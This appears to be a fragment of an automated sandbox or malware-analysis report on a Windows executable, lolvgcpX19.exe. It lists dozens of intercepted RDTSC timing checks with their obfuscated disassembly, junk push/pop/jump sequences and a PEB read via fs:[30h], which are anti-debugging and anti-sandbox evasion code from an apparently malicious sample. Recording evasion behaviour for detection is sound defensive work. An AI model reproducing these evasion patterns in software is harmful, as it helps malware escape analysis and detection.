Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 188A355 second address: 188A38C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7B99161527h 0x0000000f jbe 00007F7B99161516h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 188A38C second address: 188A3A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F7B98E5482Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 188A3A2 second address: 188A3BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F7B99161525h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 188A3BF second address: 188A40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7B98E54836h 0x0000000e pushad 0x0000000f jmp 00007F7B98E54839h 0x00000014 push edx 0x00000015 pop edx 0x00000016 jmp 00007F7B98E54834h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 188A40F second address: 188A415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 188A851 second address: 188A865 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007F7B98E54826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F7B98E54832h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 188FAE1 second address: 188FAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F7B99161522h 0x0000000b jnc 00007F7B99161516h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 188FAF4 second address: 188FAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1898E53 second address: 1898E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1898E57 second address: 1898EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B98E54835h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7B98E54833h 0x00000010 popad 0x00000011 pushad 0x00000012 jbe 00007F7B98E5483Ah 0x00000018 push edx 0x00000019 pop edx 0x0000001a jmp 00007F7B98E54832h 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1898EA7 second address: 1898EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18975DF second address: 18975FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B98E54835h 0x00000009 pop ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18975FF second address: 1897605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1897605 second address: 1897621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B98E54831h 0x00000009 jc 00007F7B98E54826h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1897895 second address: 189789C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 189789C second address: 18978B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7B98E54833h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18978B6 second address: 18978BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 189863A second address: 1898642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1898642 second address: 189865A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B9916151Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 189865A second address: 189866C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B98E5482Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 189866C second address: 1898670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1898CCC second address: 1898CE8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7B98E54826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F7B98E54828h 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 jc 00007F7B98E5483Ch 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1898CE8 second address: 1898CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 189E179 second address: 189E18F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54832h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 189E318 second address: 189E31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 189E31D second address: 189E327 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7B98E54826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 189E4A2 second address: 189E4B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18A1228 second address: 18A1263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F7B98E54835h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7B98E54838h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18A1263 second address: 18A1269 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18A1269 second address: 18A1273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18A1273 second address: 18A1277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18B43E9 second address: 18B4400 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B98E54831h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C2C85 second address: 18C2C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F7B99161516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C2C8F second address: 18C2C9C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7B98E54826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18CA3A3 second address: 18CA3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007F7B9916152Ah 0x0000000d jmp 00007F7B99161524h 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F7B99161516h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C8C4F second address: 18C8C59 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7B98E54826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C8DEC second address: 18C8DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C8DF1 second address: 18C8E2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7B98E5482Bh 0x00000008 jmp 00007F7B98E54835h 0x0000000d pop ecx 0x0000000e js 00007F7B98E5482Ch 0x00000014 jnc 00007F7B98E54826h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C8E2B second address: 18C8E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C8E2F second address: 18C8E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C8E33 second address: 18C8E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F7B99161516h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C8E43 second address: 18C8E5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54834h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C8E5D second address: 18C8E62 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C912E second address: 18C9132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C9132 second address: 18C9136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C9136 second address: 18C913E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C913E second address: 18C9170 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Bh 0x00000007 push esi 0x00000008 jmp 00007F7B99161526h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F7B99161516h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C9439 second address: 18C9459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F7B98E54837h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C9459 second address: 18C946F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7B99161516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F7B99161518h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C946F second address: 18C9473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18C9473 second address: 18C9477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18CBB39 second address: 18CBB43 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7B98E54826h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18CF6DB second address: 18CF6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18CF6E4 second address: 18CF6FC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7B98E5482Eh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18CF6FC second address: 18CF726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F7B9916151Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7B9916151Dh 0x00000010 popad 0x00000011 pushad 0x00000012 js 00007F7B99161522h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18CF726 second address: 18CF72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18CF72C second address: 18CF751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F7B99161524h 0x0000000a jmp 00007F7B9916151Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 18CF344 second address: 18CF381 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B98E54830h 0x00000008 jmp 00007F7B98E54835h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jno 00007F7B98E54826h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7B98E5482Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 191E5E9 second address: 191E606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7B99161516h 0x00000009 jbe 00007F7B99161516h 0x0000000f jng 00007F7B99161516h 0x00000015 popad 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1922D34 second address: 1922D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1922D3A second address: 1922D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1922D3E second address: 1922D44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19228DD second address: 19228E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19228E3 second address: 19228F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7B98E5482Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19228F9 second address: 19228FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1922A22 second address: 1922A4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jl 00007F7B98E54826h 0x0000000b jnc 00007F7B98E54826h 0x00000011 jmp 00007F7B98E54834h 0x00000016 popad 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 1922A4B second address: 1922A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F7B9916153Fh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19EE94A second address: 19EE969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54835h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19EE969 second address: 19EE96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19EEF75 second address: 19EEF83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jnp 00007F7B98E54826h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19EEF83 second address: 19EEF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19EEF8E second address: 19EEF92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19EF22F second address: 19EF235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19EF6E0 second address: 19EF6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19F53A1 second address: 19F53A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 19F53A6 second address: 19F53B9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7B98E5482Eh 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0008 second address: 6DD000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD000C second address: 6DD0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0012 second address: 6DD0018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0018 second address: 6DD001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD001C second address: 6DD0020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0020 second address: 6DD0044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7B98E54839h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0044 second address: 6DD00E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B99161527h 0x00000009 adc esi, 79497D6Eh 0x0000000f jmp 00007F7B99161529h 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c jmp 00007F7B99161523h 0x00000021 pushfd 0x00000022 jmp 00007F7B99161528h 0x00000027 add ecx, 37DDF348h 0x0000002d jmp 00007F7B9916151Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xchg eax, ebp 0x00000035 pushad 0x00000036 movzx ecx, bx 0x00000039 mov bh, 4Ah 0x0000003b popad 0x0000003c mov ebp, esp 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F7B99161522h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD00E5 second address: 6DD00EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD00EB second address: 6DD0135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f jmp 00007F7B99161520h 0x00000014 sub esp, 18h 0x00000017 jmp 00007F7B99161520h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7B9916151Ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0135 second address: 6DD0139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0139 second address: 6DD013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD013F second address: 6DD0191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E5482Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7B98E5482Bh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7B98E5482Bh 0x00000019 and eax, 0ACB0B0Eh 0x0000001f jmp 00007F7B98E54839h 0x00000024 popfd 0x00000025 movzx esi, di 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0191 second address: 6DD0197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD0197 second address: 6DD019B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD019B second address: 6DD01E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7B9916151Dh 0x00000014 sbb ax, 9DF6h 0x00000019 jmp 00007F7B99161521h 0x0000001e popfd 0x0000001f call 00007F7B99161520h 0x00000024 pop ecx 0x00000025 popad 0x00000026 rdtsc
